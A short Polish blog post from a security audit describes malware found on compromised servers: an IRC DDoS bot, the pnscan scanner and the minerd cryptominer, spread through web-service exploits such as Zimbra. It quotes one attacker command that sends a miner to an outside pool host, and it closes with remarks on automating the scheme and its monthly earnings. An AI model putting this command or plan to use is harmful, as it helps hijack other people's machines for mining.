Bez względu na to, czy używasz systemu Linux czy Windows, powinieneś zadbać o aktualizacje oraz dobrą konfigurację swoich usług. Ostatnio, wykonując audyt bezpieczeństwa natknąłem się na procesy takie jak: scsl.pyo, pnscan.c oraz minerd.
Pierwszy program to (jak okazało się po dekompilacji) klient IRC, który wykonuje polecenia hakera (najczęściej ataki typu DOS i DDOS).
Drugi to wielowątkowy skaner portów (może nie ma tylu możliwości co Nmap, ale jest o niebo szybszy). Taki kombajn pozwala na wykrycie wielu potencjalnie zagrożonych maszyn, które mogą zostać koparkami kryptowaluty. Zasada działania jest prosta: pnscan przeszukuje zakresy sieci (CIDR) na porcie 80 i/lub 8080 w poszukiwaniu konkretnych usług, które np. nie zostały jeszcze (lub nigdy) skonfigurowane. Następnie wywoływany jest exploit, który w prosty i szybki sposób przejmuje całkowitą kontrolę nad maszyną. W momencie przejęcia kontroli następuje upload usługi do kopania coinów (minerd). Co ciekawe, większość przypadków, które widziałem przekierowywały sygnały na oficjalne proxy hakera:
./minerd32 -B -o stratum+tcp://hecks.ddosdev.com:3334 -u ilovebigdongs.1 -p x
Ostatnio dość popularnym sposobem na uzyskiwanie dostępu do zdalnego komputera jest exploit systemu pracy grupowej Zimbra. Co najciekawsze ataki, które opisałem nie wymagają wysoce wysublimowanej wiedzy hakerskiej, wystarczy jedynie wiedzieć, które usługi są zagrożone, napisać krótki skrypt do skanowania lub wykorzystać istniejący oraz zaaplikować exploit na zdalną maszynę. Dodatkowo, przy odrobinie sprytu cały proces można zautomatyzować tak, aby mieć wolne ręce. Od tego momentu wystarczy już tylko kopać. Zyski z 1500 zdalnych maszyn to ok. 3000 PLN miesięcznie. Należy jednak pamiętać, że bez odpowiednich przekierowań, ani rusz!
Zdjęcie: [1]